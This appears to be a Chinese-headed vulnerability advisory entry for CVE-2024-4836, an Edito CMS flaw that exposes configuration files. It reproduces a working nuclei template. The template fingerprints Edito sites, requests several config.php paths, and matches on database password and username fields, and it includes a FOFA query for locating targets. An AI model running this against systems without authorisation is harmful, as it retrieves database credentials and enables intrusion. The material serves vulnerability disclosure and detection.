CVE-2024-4836: Edito CMS - Sensitive Data Leak

日期: 2025-08-01 | 影响软件: Edito CMS | POC: 已公开

漏洞描述

Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.

PoC代码[已公开]

id: CVE-2024-4836

info:
  name: Edito CMS - Sensitive Data Leak
  author: s4e-io
  severity: high
  description: |
    Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
  reference:
    - https://cert.pl/en/posts/2024/07/CVE-2024-4836/
    - https://github.com/sleep46/CVE-2024-4836_Check
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4836
  classification:
    epss-score: 0.36523
    epss-percentile: 0.9702
  metadata:
    max-request: 5
    fofa-query: icon_hash="1491301339"
  tags: cve,cve2024,cms,edito,info-leak

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body,"content=\"edito", "www.edito.pl")'
          - "status_code==200"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/config.php"
      - "{{BaseURL}}/config/config.php"
      - "{{BaseURL}}/include/config.php"
      - "{{BaseURL}}/includes/config.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"db_password", "db_username")'
          - "status_code==200"
        condition: and
# digest: 4a0a004730450221008900cb07c7dcbc22a7638c5c02b17238f50fa2083605a366d81a2e609f510de8022024694a96a824210f9d04c1e9a6fd0b9fba752afaa7968b405e06d7cd8cc991f3:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-4836.yaml